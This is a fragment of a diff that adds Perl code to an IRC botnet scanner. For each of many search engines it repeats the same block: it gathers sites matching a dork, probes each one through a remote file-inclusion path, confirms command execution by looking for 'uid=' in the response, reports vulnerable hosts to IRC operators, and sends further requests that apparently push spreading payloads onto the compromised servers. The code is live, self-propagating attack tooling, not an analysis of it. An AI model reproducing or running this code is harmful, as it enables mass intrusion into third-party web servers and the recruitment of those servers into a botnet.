+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1GoOglE]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1GoOgLe]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1GoOglE]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG Shinchi :13Vuln:9,1 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1GoOgLe]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### AllTheWeb
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @alltheweb=&allthewebt($dork);
+	my @allweb=&standard($dork);
+#
+push(my @tot, @alltheweb, @allweb);
+#
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1AllTheWeb]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]12,1 $dork");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1AllTheWeb]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1AllTheWeb]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1AllTheWeb]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### LYCOS
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @lylist=&lycos($dork);
+push(my @lybyp,@lylist);
+#
+push(my @tot, @lybyp);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1LyCoS]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1LyCoS]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1LyCoS]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1LyCoS]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### Yahoo
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @ylist=&yahoo($dork);
+	my @yalist=&yahooa($dork);
+	my @yblist=&yahoob($dork);
+	my @yclist=&yahooc($dork);
+	my @ydlist=&yahood($dork);
+		push(my @yahoobypass, @ylist, @yalist, @yblist, @yclist, @ydlist );
+#
+push(my @tot, @yahoobypass);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1YaHoO]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1YaHoO]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1YaHoO]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1YaHoO]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### MSN
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @mlist=&msn($dork);
+push(my @tot, @mlist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1MSN]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1MSN]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1MSN]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1MSN]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### SEARCH
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @slist=&search($dork);
+push(my @tot, @slist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Search]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1Search]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Search]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1Search]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### FireBall
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @fireball=fireball($dork);
+push(my @tot, @fireball);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1FireBall]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1FireBall]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1FireBall]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1FireBall]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### UOL
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @ulist=&uol($dork);
+push(my @tot, @ulist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1UOL]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1UOL]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1UOL]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1UOL]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### ALTAVISTA
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @alist=&altavista($dork);
+	my @ablist=&altavistade($dork);
+	my @aclist=&altavistaus($dork);
+push(my @tot, @alist,@ablist,@aclist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Altavista]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1Altavista]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Altavista]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1Altavista]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### HOTBOT
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @hlist=&hotbot($dork);
+	my @hlistb=&hotbotb($dork);
+push(my @tot, @hlist, @hlistb);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1HotBot]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1HotBot]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1HotBot]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1HotBot]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### MAMMA
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @malist=&mamma($dork);
+push(my @tot, @malist);
+my @puliti=&unici(@tot);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Mamma]13,6[1ToTaL]:8,6 ".scalar(@tot)." 11,10[1CleaneD]:8,6 ".scalar(@puliti)." 11,10[1Untuk]13,6[1Dork]4,1 $dork ");
+my $uni=scalar(@puliti);
+foreach my $sito (@puliti)
+{
+$contatore++;
+if ($contatore %100==0){
+}
+if ($contatore==$uni-1){
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1Mamma]11,10[1SeLeSaI]13,6[1UnTuK]11,10[1DoRk]13,1 $dork");
+}
+### Print CMD and TEST CMD###
+my $test="http://".$sito.$bug.$id."?";
+my $print="http://".$sito.$bug.$cmd."?";
+### End of Print CMD and TEST CMD###
+my $req=HTTP::Request->new(GET=>$test);
+my $ua=LWP::UserAgent->new();
+$ua->timeout(5);
+my $response=$ua->request($req);
+if ($response->is_success) {
+my $re=$response->content;
+if($re =~ /AnakDompu/ && $re =~ /uid=/){
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :11,10[1Mamma]13,6[1OFF] 11,10[1Uname]10:7 $type 13,6[1TaRgEt]:9,1 $print");
+  sendraw($IRC_cur_socket, "PRIVMSG Shinchi :Uname:6 $type Vuln:10 $print");
+my $test2="http://".$sito.$bug.$spread."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+my $cinta="http://".$sito.$bug.$perawan."?";
+my $kasih=HTTP::Request->new(GET=>$cinta);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($kasih);
+}}
+elsif($re =~ /AnakDompu/)
+{
+my $hs=geths($print); $hosts{$hs}++;
+if($hosts{$hs}=="1"){
+$x=os($test);
+($type,$space)=split(/\,/,$x);
+  sendraw($IRC_cur_socket, "PRIVMSG $printl :13,6[1Mamma]11,10[1ON] 13,6[1TaRgEt]7,1 $print");
+my $test2="http://".$sito.$bug.$idku."?";
+my $reqz=HTTP::Request->new(GET=>$test2);
+my $ua=LWP::UserAgent->new();
+my $response=$ua->request($reqz);
+}}
+}}}
+exit;
+}}
+
+######################################################################
+#################### MOZBOT
+######################################################################
+if ($funcarg =~ /^scan\s+(.*?)\s+(.*)/){
+if (my $pid = fork) {
+waitpid($pid, 0);
+} else {
+if (fork) {
+exit;
+} else {
+my $bug=$1;
+my $dork=$2;
+my $contatore=0;
+my %hosts;
+# Starting The Search Engine
+	my @mozlist=&mozbot($dork);
+	my @mozlista=&mozbota($dork);
+        my @mozlistb=&mozbotb($dork);
+push(my @tot, @mozlist, @mozlista, @mozlistb);
+my @puliti=&unici(@tot);
